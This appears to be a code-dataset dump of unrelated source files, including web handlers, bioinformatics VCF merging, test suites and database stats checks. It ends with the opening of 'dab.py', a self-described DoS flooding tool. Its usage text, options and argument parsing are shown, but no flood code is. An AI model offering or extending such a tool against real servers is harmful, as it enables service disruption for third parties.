}
}
}
@acl_decorators.can_access_topic_viewer_page
def get(self, topic_name):
# Topic cannot be None as an exception will be thrown from its decorator
# if so.
topic = topic_fetchers.get_topic_by_name(topic_name)
selected_subtopic_ids = (
self.normalized_request.get('selected_subtopic_ids'))
selected_skill_ids = []
for subtopic in topic.subtopics:
# An error is not thrown here, since it's fine to just ignore the
# passed in subtopic IDs, if they don't exist, which would be the
# case if the creator deletes subtopics after the learner has
# loaded the topic viewer page.
if subtopic.id in selected_subtopic_ids:
selected_skill_ids.extend(subtopic.skill_ids)
try:
skills = skill_fetchers.get_multi_skills(selected_skill_ids)
except Exception as e:
raise self.PageNotFoundException(e)
skill_ids_to_descriptions_map = {}
for skill in skills:
skill_ids_to_descriptions_map[skill.id] = skill.description
self.values.update({ | 'topic_name': topic.name,
'skill_ids_to_descriptions_map': skill_ids_to_descriptions_map
})
self.render_json(self.values)
| |
warner/magic-wormhole-transit-relay | misc/migrate_usage_db.py | Python | mit | 1,883 | 0 | """Migrate the usage data from the old bundled Transit Relay database.
The magic-wormhole package used to include both servers (Rendezvous and
Transit). "wormhole server" started both of these, and used the
"relay.sqlite" database to store both immediate server state and long-term
usage data.
These were split out to their own packages: version 0.11 omitted the Transit
Relay in favor of the new "magic-wormhole-transit-relay" distribution.
This script reads the long-term Transit usage data from the pre-0.11
wormhole-server relay.sqlite, and copies it into a new "u | sage.sqlite"
database in the current directory.
It will refuse to touch an existing "usage.sqlite" file.
The resuting "usage.sqlite" should be passed into --usage-db=, e.g. "twist
transitrelay --usage=.../PATH/TO/usage.sqlite".
"""
from __future__ import unicode_l | iterals, print_function
import sys
from wormhole_transit_relay.database import open_existing_db, create_db
source_fn = sys.argv[1]
source_db = open_existing_db(source_fn)
target_db = create_db("usage.sqlite")
num_rows = 0
for row in source_db.execute("SELECT * FROM `transit_usage`"
" ORDER BY `started`").fetchall():
target_db.execute("INSERT INTO `usage`"
" (`started`, `total_time`, `waiting_time`,"
" `total_bytes`, `result`)"
" VALUES(?,?,?,?,?)",
(row["started"], row["total_time"], row["waiting_time"],
row["total_bytes"], row["result"]))
num_rows += 1
target_db.execute("INSERT INTO `current`"
" (`rebooted`, `updated`, `connected`, `waiting`,"
" `incomplete_bytes`)"
" VALUES(?,?,?,?,?)",
(0, 0, 0, 0, 0))
target_db.commit()
print("usage database migrated (%d rows) into 'usage.sqlite'" % num_rows)
sys.exit(0)
|
maxime-beck/compassion-modules | partner_communication_revision/wizards/submit_revision_wizard.py | Python | agpl-3.0 | 2,059 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2018 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import models, api, fields
class ValidateRevisionWizard(models.TransientModel):
_name = 'partner.communication.submit.revision'
_description = 'Submit revision text wizard'
revision_id = fields.Many2one(
'partner.communication.revision',
default=lambda s: s._default_revision(),
)
state = fields.Selection(related='revision_id.state')
reviser_name = fields.Char(related='revision_id.user_id.name')
corrector_name = fields.Char(related='revision_id.correction_user_id.name')
comments = fields.Text()
@api.model
def _default_revision(self):
return self.env['partner.communication.revision'].browse(
s | elf._context['active_id'])
@api.multi
def submit | (self):
self.ensure_one()
revision = self.revision_id
if self.state == 'pending':
subject_base = u'[{}] Revision text submitted'
body_base = u'A new text for was submitted for approval. {}'
revision.write({
'proposition_correction':
revision.proposition_correction or revision.proposition_text,
'subject_correction':
revision.subject_correction or revision.subject,
'state': 'submit',
})
else:
subject_base = u'[{}] Correction submitted'
body_base = u'Corrections were proposed. {}'
revision.write({'state': 'corrected'})
body = body_base.format(self.comments or '').strip()
subject = subject_base.format(revision.display_name)
revision.notify_proposition(subject, body)
return True
|
elifesciences/elife-tools | tests/fixtures/test_refs/content_07_expected.py | Python | mit | 1,260 | 0.003175 | from collections import OrderedDict
expected = [
{
"uri_text": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"comment": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"data-title": "Mus musculus T-box 2 (Tbx2), mRNA",
"article_doi": "10.5334/cstp.77",
"authors": | [
{"surname": "Bollag", "given-names": "RJ", "group-type": "author"},
{"surname": "Siegfried", "given-names": "Z", "group-type": "author"},
{"surname": "Cebra-Thomas", "gi | ven-names": "J", "group-type": "author"},
{"surname": "Garvey", "given-names": "N", "group-type": "author"},
{"surname": "Davison", "given-names": "EM", "group-type": "author"},
{"surname": "Silver", "given-names": "LM", "group-type": "author"},
],
"accession": "NM_009324",
"uri": "http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"source": "NCBI Nucleotide",
"year": "1994b",
"position": 1,
"publication-type": "data",
"ref": "Bollag RJ Siegfried Z Cebra-Thomas J Garvey N Davison EM Silver LM 1994b Mus musculus T-box 2 (Tbx2), mRNA NCBI Nucleotide NM_009324 http://www.ncbi.nlm.nih.gov/nuccore/120407038",
"id": "bib15",
}
]
|
bioinform/somaticseq | somaticseq/combine_callers.py | Python | bsd-2-clause | 22,749 | 0.018243 | #!/usr/bin/env python3
import os, re, subprocess
import somaticseq.vcfModifier.copy_TextFile as copy_TextFile
import somaticseq.vcfModifier.splitVcf as splitV | cf
import somaticseq.vcfModifier.getUniqueVcfPositions as getUniqueVcfPositions
from somaticseq.vcfModifier.vcfIntersector import *
# Combine individual VCF output into a simple combined VCF file, for single-sample callers
def comb | ineSingle(outdir, ref, bam, inclusion=None, exclusion=None,
mutect=None, mutect2=None, varscan=None, vardict=None, lofreq=None, scalpel=None, strelka=None,
arb_snvs=None, arb_indels=None, keep_intermediates=False):
if arb_snvs is None: arb_snvs = []
if arb_indels is None: arb_indels = []
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2' :{'snv': None, 'indel': None},
'VarScan2' :{'snv': None, 'indel': None},
'VarDict' :{'snv': None, 'indel': None},
'LoFreq' :{'snv': None, 'indel': None},
'Strelka' :{'snv': None, 'indel': None},
'Arbitrary' :{'snv': [], 'indel': []},
}
if mutect:
import somaticseq.vcfModifier.modify_MuTect as mod_mutect
mutect_in = bed_intersector(mutect, os.sep.join(( outdir, 'intersect.mutect1.vcf' )), inclusion, exclusion)
intermediate_files.add(mutect_in)
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, bam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if mutect2:
import somaticseq.vcfModifier.modify_ssMuTect2 as mod_mutect2
mutect2_in = bed_intersector(mutect2, os.sep.join(( outdir, 'intersect.mutect2.vcf' )), inclusion, exclusion)
intermediate_files.add(mutect2_in)
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect2.vcf' ))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect2.vcf' ))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan:
import somaticseq.vcfModifier.modify_VarScan2 as mod_varscan2
varscan_in = bed_intersector(varscan, os.sep.join(( outdir, 'intersect.varscan.vcf' )), inclusion, exclusion)
intermediate_files.add(varscan_in)
snv_temp = os.sep.join(( outdir, 'snv.varscan.temp.vcf' ))
indel_temp = os.sep.join(( outdir, 'indel.varscan.temp.vcf' ))
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf' ))
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
splitVcf.split_into_snv_and_indel(varscan_in, snv_temp, indel_temp)
mod_varscan2.convert(snv_temp, snv_varscan_out)
mod_varscan2.convert(indel_temp, indel_varscan_out)
for file_i in snv_temp, indel_temp, snv_varscan_out, indel_varscan_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_varscan_out)
indel_intermediates.append(indel_varscan_out)
intermediate_vcfs['VarScan2']['snv'] = snv_varscan_out
intermediate_vcfs['VarScan2']['indel'] = indel_varscan_out
if vardict:
import somaticseq.vcfModifier.modify_VarDict as mod_vardict
# If the VarDict VCF file has line that clash with bedtools
cleaned_vardict = os.sep.join(( outdir, 'cleaned.vardict.vcf' ))
cleaned_vardict = remove_vcf_illegal_lines(vardict, cleaned_vardict)
if cleaned_vardict:
intermediate_files.add( cleaned_vardict )
else:
cleaned_vardict = vardict
vardict_in = bed_intersector(cleaned_vardict, os.sep.join(( outdir, 'intersect.vardict.vcf' )), inclusion, exclusion)
intermediate_files.add(vardict_in)
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf'))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf'))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf'))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add( file_i )
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if lofreq:
lofreq_in = bed_intersector(lofreq, os.sep.join(( outdir, 'intersect.lofreq.vcf' )), inclusion, exclusion)
intermediate_files.add(lofreq_in)
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
splitVcf.split_into_snv_and_indel(lofreq_in, snv_lofreq_out, indel_lofreq_out)
for file_i in snv_lofreq_out, indel_lofreq_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
intermediate_vcfs['LoFreq']['snv'] = snv_lofreq_out
intermediate_vcfs['LoFreq']['indel'] = indel_lofreq_out
if scalpel:
scalpel_in = bed_intersector(scalpel, os.sep.join(( outdir, 'intersect.scalpel.vcf' )), inclusion, exclusion)
intermediate_files.add(scalpel_in)
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka:
import somaticseq.vcfModifier.modify_ssStrelka as mod_strelka
strelka_in = bed_intersector(strelka, os.sep.join(( outdir, 'intersect.strelka.vcf' )), inclusion, exclusion)
intermediate_files.add(strelka_in)
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out, indel_strelka_out)
for file_i in snv_strelka_out, indel_strelka_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_strelka_out)
indel_intermediates.append(indel_strelka_out)
intermediate_vcfs['Strelka']['snv'] = snv_strelka_out
intermediate_vcfs['Strelka']['indel'] = indel_strelka_out
for ith_arb, arb_vcf_i in enumerate(arb_snvs):
arb_vcf_in = bed_intersector(arb_vcf_i, os.sep.join(( outdir, 'intersect.snv.arb_{}.vcf'.format(ith_arb) )), inclusion, exclusion)
intermediate_files.add(arb_vcf_in)
arb_vcf_out = os.sep.join(( outdir, 'snv.arb_{}.vcf'.format(ith_arb) ))
copy_TextFile.copy(arb_vcf_in, arb_vcf_out)
intermediate_files.add(arb_vcf_out)
snv_intermediates.append(arb_vcf_out)
intermediate_vcfs['Arbitrary']['snv'].append( arb_vcf_out )
for ith_arb, arb_vcf_i in enumerate(arb_indels):
arb_vcf_in = bed_intersector(arb_vcf_i, os.sep.join(( outdir, 'intersect.indel.arb_{}.vcf'.format(ith_arb) )), inclusion, exclusion)
intermediate_files |
mtreinish/stestr | stestr/tests/test_selection.py | Python | apache-2.0 | 7,058 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import io
import re
from unittest import mock
from stestr import selection
from stestr.tests import base
class TestSelection(base.TestCase):
def test_filter_tests_no_filter(s | elf):
test_list = ['a', 'b', 'c']
result = selection.filter_tests(None, test_list)
self.assertEqual(test_list, result)
def test_filter_tests(self):
test_list = ['a', 'b', 'c']
result = selection.filter_tests(['a'], test_list)
self.assertEqual(['a'], result)
def test_filter_invalid_regex(self):
test_list = ['a', 'b', 'c']
with mock.patch('sys.exit', side_effect=ImportError) as mock_exit:
self.assertRaises(ImportError, sele | ction.filter_tests,
['fake_regex_with_bad_part[The-BAD-part]'],
test_list)
mock_exit.assert_called_once_with(5)
class TestExclusionReader(base.TestCase):
def test_exclusion_reader(self):
exclude_list = io.StringIO()
for i in range(4):
exclude_list.write('fake_regex_%s\n' % i)
exclude_list.write('fake_regex_with_note_%s # note\n' % i)
exclude_list.seek(0)
with mock.patch('builtins.open',
return_value=exclude_list):
result = selection.exclusion_reader('fake_path')
self.assertEqual(2 * 4, len(result))
note_cnt = 0
# not assuming ordering, mainly just testing the type
for r in result:
self.assertEqual(r[2], [])
if r[1] == 'note':
note_cnt += 1
self.assertIn('search', dir(r[0])) # like a compiled regexp
self.assertEqual(note_cnt, 4)
def test_invalid_regex(self):
exclude_list = io.StringIO()
exclude_list.write("fake_regex_with_bad_part[The-BAD-part]")
exclude_list.seek(0)
with mock.patch('builtins.open',
return_value=exclude_list):
with mock.patch('sys.exit') as mock_exit:
selection.exclusion_reader('fake_path')
mock_exit.assert_called_once_with(5)
class TestConstructList(base.TestCase):
def test_simple_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
result = selection.construct_list(test_lists, regexes=['foo'])
self.assertEqual(list(result), ['fake_test(scen)[egg,foo])'])
def test_simple_exclusion_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
result = selection.construct_list(test_lists, exclude_regex='foo')
self.assertEqual(list(result), ['fake_test(scen)[tag,bar])'])
def test_invalid_exclusion_re(self):
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
invalid_regex = "fake_regex_with_bad_part[The-BAD-part]"
with mock.patch('sys.exit', side_effect=ImportError) as exit_mock:
self.assertRaises(ImportError, selection.construct_list,
test_lists, exclude_regex=invalid_regex)
exit_mock.assert_called_once_with(5)
def test_exclusion_list(self):
exclude_list = [(re.compile('foo'), 'foo not liked', [])]
test_lists = ['fake_test(scen)[tag,bar])', 'fake_test(scen)[egg,foo])']
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(test_lists,
exclude_list='file',
regexes=['fake_test'])
self.assertEqual(list(result), ['fake_test(scen)[tag,bar])'])
def test_inclusion_list(self):
include_list = [re.compile('fake_test1'), re.compile('fake_test2')]
test_lists = ['fake_test1[tg]', 'fake_test2[tg]', 'fake_test3[tg]']
include_getter = 'stestr.selection._get_regex_from_include_list'
with mock.patch(include_getter,
return_value=include_list):
result = selection.construct_list(test_lists,
include_list='file')
self.assertEqual(set(result),
{'fake_test1[tg]', 'fake_test2[tg]'})
def test_inclusion_list_invalid_regex(self):
include_list = io.StringIO()
include_list.write("fake_regex_with_bad_part[The-BAD-part]")
include_list.seek(0)
with mock.patch('builtins.open',
return_value=include_list):
with mock.patch('sys.exit') as mock_exit:
selection._get_regex_from_include_list('fake_path')
mock_exit.assert_called_once_with(5)
def test_inclusion_exclusion_list_re(self):
include_list = [re.compile('fake_test1'), re.compile('fake_test2')]
test_lists = ['fake_test1[tg]', 'fake_test2[spam]',
'fake_test3[tg,foo]', 'fake_test4[spam]']
exclude_list = [(re.compile('spam'), 'spam not liked', [])]
include_getter = 'stestr.selection._get_regex_from_include_list'
with mock.patch(include_getter,
return_value=include_list):
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(
test_lists, exclude_list='exclude_file',
include_list='include_file', regexes=['foo'])
self.assertEqual(set(result),
{'fake_test1[tg]', 'fake_test3[tg,foo]'})
def test_overlapping_exclude_regex(self):
exclude_list = [(re.compile('compute.test_keypairs.KeypairsTestV210'),
'', []),
(re.compile('compute.test_keypairs.KeypairsTestV21'),
'', [])]
test_lists = [
'compute.test_keypairs.KeypairsTestV210.test_create_keypair',
'compute.test_keypairs.KeypairsTestV21.test_create_keypair',
'compute.test_fake.FakeTest.test_fake_test']
with mock.patch('stestr.selection.exclusion_reader',
return_value=exclude_list):
result = selection.construct_list(test_lists,
exclude_list='file',
regexes=['fake_test'])
self.assertEqual(
list(result), ['compute.test_fake.FakeTest.test_fake_test'])
|
ml31415/numpy-groupies | numpy_groupies/tests/__init__.py | Python | bsd-2-clause | 2,023 | 0.00346 | import pytest
from .. import aggregate_purepy, aggregate_numpy_ufunc, aggregate_numpy
try:
from .. import aggregate_numba
except ImportError:
aggregate_numba = None
try:
from .. import aggregate_weave
except ImportError:
aggregate_weave = None
try:
from .. import aggregate_pandas
except ImportError:
aggregate_pandas = None
_implementations = [aggregate_purepy, aggregate_numpy_ufunc, aggregate_numpy,
aggregate_numba, aggregate_weave, aggregate_pandas]
_implementations = [i for i in _implementations if i is not None]
def _impl_name(impl):
if not impl:
return
return impl.__name__.rsplit('aggregate_', 1)[1].rsplit('_', 1)[-1]
_not_implemented_by_impl_name = {
'numpy': ['cumprod','cummax', 'cummin'],
'purepy': ['cumprod','cummax', 'cummin'],
'numba': ('array', 'list'),
'pandas': ('array', 'list'),
'weave': ('argmin', 'argmax', 'array', 'list', 'cumsum',
'<lambda>', 'func_preserve_order', 'func_arbitrary')}
def _wrap_notimplemented_xfail(impl, name=None):
"""Some implementations lack some functionality. That's ok, let's xfail that instead of raising errors."""
def _try_xfail(*args, **kwargs):
try:
return impl(*args, **kwargs)
except NotImplementedError as e:
func = kwargs.pop('func', None)
if callable(func):
func = func.__name__
wrap_funcs = _not_implemented_b | y_impl_name.get | (func, None)
if wrap_funcs is None or func in wrap_funcs:
pytest.xfail("Functionality not implemented")
else:
raise e
if name:
_try_xfail.__name__ = name
else:
_try_xfail.__name__ = impl.__name__
return _try_xfail
func_list = ('sum', 'prod', 'min', 'max', 'all', 'any', 'mean', 'std', 'var', 'len',
'argmin', 'argmax', 'anynan', 'allnan', 'cumsum',
'nansum', 'nanprod', 'nanmin', 'nanmax', 'nanmean', 'nanstd', 'nanvar','nanlen')
|
ceibal-tatu/sugar-toolkit | tests/graphics/toolbarpalettes.py | Python | lgpl-2.1 | 1,649 | 0 | # Copyright (C) 2007, Red Hat, Inc.
# |
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the | Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
Test palette positioning for toolbar and tray.
"""
import gtk
from sugar.graphics.tray import HTray, TrayButton
from sugar.graphics.toolbutton import ToolButton
import common
test = common.Test()
vbox = gtk.VBox()
theme_icons = gtk.icon_theme_get_default().list_icons()
toolbar = gtk.Toolbar()
vbox.pack_start(toolbar, False)
toolbar.show()
for i in range(0, 5):
button = ToolButton(icon_name=theme_icons[i])
button.set_tooltip('Icon %d' % i)
toolbar.insert(button, -1)
button.show()
content = gtk.Label()
vbox.pack_start(content)
content.show()
tray = HTray()
vbox.pack_start(tray, False)
tray.show()
for i in range(0, 30):
button = TrayButton(icon_name=theme_icons[i])
button.set_tooltip('Icon %d' % i)
tray.add_item(button)
button.show()
test.pack_start(vbox)
vbox.show()
test.show()
if __name__ == '__main__':
common.main(test)
|
deerwalk/voltdb | lib/python/voltcli/checkstats.py | Python | agpl-3.0 | 18,888 | 0.006777 | # This file is part of VoltDB.
# Copyright (C) 2008-2017 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
import sys
import time
import voltdbclient
def check_exporter(runner):
runner.info('Completing outstanding exporter transactions...')
last_table_stat_time = 0
export_tables_with_data = dict()
last_table_stat_time = check_export_stats(runner, export_tables_with_data, last_table_stat_time)
if last_table_stat_time == 1:
# there are no outstanding export transactions
runner.info('All exporter transactions have been processed.')
return
# after 10 seconds notify admin of what transactions have not drained
notifyInterval = 10
# have to get two samples of table stats because the cached value could be from before Quiesce
last_export_tables_with_data = dict()
lastUpdatedTime = time.time()
while True:
time.sleep(1)
if last_table_stat_time > 1:
curr_table_stat_time = check_export_stats(runner, export_tables_with_data, last_table_stat_time)
if last_table_stat_time == 1 or curr_table_stat_time > last_table_stat_time:
# have a new sample from table stat cache or there are no tables
if not export_tables_with_data:
runner.info('All exporter transactions have been processed.')
return
notifyInterval -= 1
if notifyInterval == 0:
| notifyInterva | l = 10
if last_table_stat_time > 1 and export_tables_with_data:
print_export_pending(runner, export_tables_with_data)
lastUpdatedTime = monitorStatisticsProgress(last_export_tables_with_data, export_tables_with_data, lastUpdatedTime, runner, 'Exporter')
last_export_tables_with_data = export_tables_with_data.copy()
def check_dr_producer(runner):
runner.info('Completing outstanding DR producer transactions...')
partition_min_host = dict()
partition_min = dict()
partition_max = dict()
partition_gap_min = dict()
last_partition_min = dict()
last_partition_max = dict()
lastUpdatedTime = time.time()
dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
if not partition_min:
# there are no outstanding export or dr transactions
runner.info('All DR producer transactions have been processed.')
return
# after 10 seconds notify admin of what transactions have not drained
notifyInterval = 10
# have to get two samples of table stats because the cached value could be from before Quiesce
while True:
time.sleep(1)
if partition_min:
dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
if not partition_min:
runner.info('All DR producer transactions have been processed.')
return
notifyInterval -= 1
if notifyInterval == 0:
notifyInterval = 10
if partition_min:
print_dr_pending(runner, partition_min_host, partition_min, partition_max, partition_gap_min)
lastUpdatedTime = monitorDRProducerStatisticsProgress(last_partition_min, last_partition_max, partition_min, partition_max, lastUpdatedTime, runner)
last_partition_min = partition_min.copy()
last_partition_max = partition_max.copy()
def monitorDRProducerStatisticsProgress(lastPartitionMin, lastPartitionMax, currentPartitionMin,
currentPartitionMax, lastUpdatedTime, runner):
currentTime = time.time()
timeout = runner.opts.timeout
#any stats progress?
partitionMinProgressed = cmp(lastPartitionMin, currentPartitionMin)
partitionMaxprogressed = cmp(lastPartitionMax, currentPartitionMax)
#stats moved
if partitionMinProgressed <> 0 or partitionMaxprogressed <> 0:
return currentTime
timeSinceLastUpdate = currentTime - lastUpdatedTime
#stats timeout
if timeSinceLastUpdate > timeout:
msg = "The cluster has not drained any transactions for DRPRODUCER in last %d seconds. There are outstanding transactions."
raise StatisticsProcedureException( msg % (timeout), 1)
#stats has not been moved but not timeout yet
return lastUpdatedTime
def get_stats(runner, component):
retry = 5
while retry > 0:
retry -= 1
resp = runner.call_proc('@Statistics', [voltdbclient.FastSerializer.VOLTTYPE_STRING,
voltdbclient.FastSerializer.VOLTTYPE_INTEGER], [component, 0], False)
status = resp.status()
if status == 1:
return resp
#procedure timeout, retry
if status == -6:
time.sleep(1)
else:
raise StatisticsProcedureException("Unexpected errors to collect statistics for %s: %s." % (component, resp.response.statusString), 1, False)
if retry == 0:
raise StatisticsProcedureException("Unable to collect statistics for %s after 5 attempts." % component, 1, False)
def dr_producer_stats(runner, partition_min_host, partition_min, partition_max, partition_gap_min):
resp = get_stats(runner, 'DRPRODUCER')
partition_data = resp.table(0)
for pid in partition_min:
# reset all min values to find the new min
if pid in partition_max:
partition_min[pid] = partition_max[pid]
if len(partition_data.tuples()) == 0:
return
for row in partition_data.tuples():
pid = row[5]
hostname = str(row[2])
if str(row[10]) == 'None':
last_queued = -1
else:
last_queued = row[10]
if str(row[11]) == 'None':
last_acked = -1
else:
last_acked = row[11]
if str(row[16]) == 'None':
queue_gap = 0
else:
queue_gap = row[16]
# Initial state, no transactions are queued and acknowledged.
if last_queued == -1 and last_acked == -1:
continue
# check TOTALBYTES
if row[7] > 0 or queue_gap != 0:
# track the highest seen drId for each partition. use last queued to get the upper bound
if pid in partition_max:
partition_max[pid] = max(last_queued, partition_max[pid])
else:
partition_max[pid] = last_queued
if pid in partition_gap_min:
# if queue_gap == 0 and last_acked == -1 do nothing because without a real ack the gap value is meaningless
if queue_gap != 0 or last_acked != -1:
partition_gap_min[pid] = min(queue_gap, partition_gap_min[pid])
else:
partition_gap_min[pid] = queue_gap
if pid in partition_min:
if last_acked < partition_min[pid]:
# this replica is farther behind
partition_min[pid] = last_acked
else:
partition_min_host[pid] = set()
partition_min[pid] = last_acked
partition_min_host[pid].add(hostname)
else:
# this hostname's partition has an empty InvocationBufferQueue
if pid in partition_min:
# it was not empty on a previous call
partition_min_host[pid].discard(hostname)
if not partition_min_host[pid]:
del partition_min_host[pid]
del partition_min[pid]
# set last queu |
BlackVikingPro/D.A.B. | dab.py | Python | gpl-3.0 | 14,157 | 0.043205 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
""" Python DAB ~ DoS Tool ~ By Wįłłý Fœx : @BlackVikingPro """
""" Current Version: v2.0 """
"""
Python D.A.B. [ |)3|\|`/ 411 |31T(|-|3z ] ~ DoS Tool ~ By Wįłłý Fœx : @BlackVikingPro
Use at your own risk. I do/will not condone any illegal activity
I'm not responsible for your actions.
Usage and Syntax:
Syntax: ./dab.py -s <target> -p <port> -t <type>
Usage | Options:
-s [--server] - Target server's ip/hostname
-p [--port] - Port to flood with packets
-t [--type] - Type of attack [udp, tcp, http]
-- if 'http' was chosen, define either: '--get' or '--post' for the request method.
-m [--message] - Custom tcp/udp/http message to send
--port-threading - Enable port threading [ --port doesn't need to be defined if this is ]
Example: ./dab.py --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt
"""
import os, sys, socket, time, requests, signal, platform, requests, threading
from multiprocessing import Process
version = 'v2.0 [stable]'
verbose = False # display verbose-level information
def usage():
print ("")
print ( " Python D.A.B. \033[93m[ |)3|\|`/ 411 |31T(|-|3z ]\033[0m ~ DoS Tool ~ By " + str("Wįłłý Fœx") + " : @BlackVikingPro" )
print ( " Use at your \033[91mown\033[0m risk. I do/will not condone any \033[91millegal\033[0m activity\n I'm not responsible for your actions.\n" )
print ( " Usage and Syntax:\n" )
if sys.argv[0].startswith('./'):
print ( " Syntax: %s -s <target> -p <port> -t <type>" % sys.argv[0] )
pass
else:
print ( " Syntax: ./%s -s <target> -p <port> -t <type>" % sys.argv[0] )
pass
print ( "\n Usage | Options:" )
print ( " -s [--server] - Target server's ip/hostname" )
print ( " -p [--port] - Port to flood with packets" )
print ( " -t [--type] - Type of attack [udp, tcp, http]" )
print ( " -- if 'http' was chosen, define either: '--get' or '--post' for the request method." )
print ( " -m [--message] - Custom tcp/udp/http message to send")
print ( " --port-threading - Enable port threading [ --port doesn't need to be defined if this is ]")
if sys.argv[0].startswith('./'):
print ( "\n Example: %s --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt" % sys.argv[0] )
else:
print ( "\n Example: ./%s --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt" % sys.argv[0] )
pass
print("")
pass
def error(message):
print ( "\n \033[93m[*] \033[91m%s\033[0m\n" % message )
pass
def warn(message):
print ( "\n\033[95m [*] \033[93m%s\033[0m\n " % message )
pass
def quick_warn(message):
print ( "\n\033[95m [*] \033[93m%s\033[0m " % message )
def signal_handler(signal, frame):
error( "Exiting cleanly..." )
sys.exit()
pass
signal.signal(signal.SIGINT, signal_handler)
if platform.system() == 'Windows':
warn("This script has not yet been tested on a Windows machine.\nTry it for me and open a new fork on GitHub! (shoutouts will be given)")
elif platform.system() == 'Linux':
_continue = True
pass
if len(sys.argv) == 1:
usage()
sys.exit()
pass
help_args = ['help', '-h', 'h', '--help', '/?', '?']
version_args = ['--version', '-v', 'version', 'ver']
try:
if sys.argv[1] in help_args:
usage()
sys.exit()
elif sys.argv[1] in version_args:
warn("Current Version: %s" % version)
usage()
sys.exit()
pass
except IndexError:
pass
try:
# server = (str(sys.argv[1]), int(sys.argv[2]))
if '-s' in | sys.argv:
s_option_pos = sys.argv.index('-s')
target = sys.argv[(s_option_pos + 1)]
elif '--server' in sys.argv:
s_option_pos = sys.argv.index('--server')
target = sys.argv[(s_option_pos + 1)]
else:
error("Error: Server not defined.")
usage()
sys.exit()
pass
if '-p' in sys.argv:
p_option_pos = sys.argv.index('-p')
port = sys.argv[(p_option_pos + 1)]
eli | f '--port' in sys.argv:
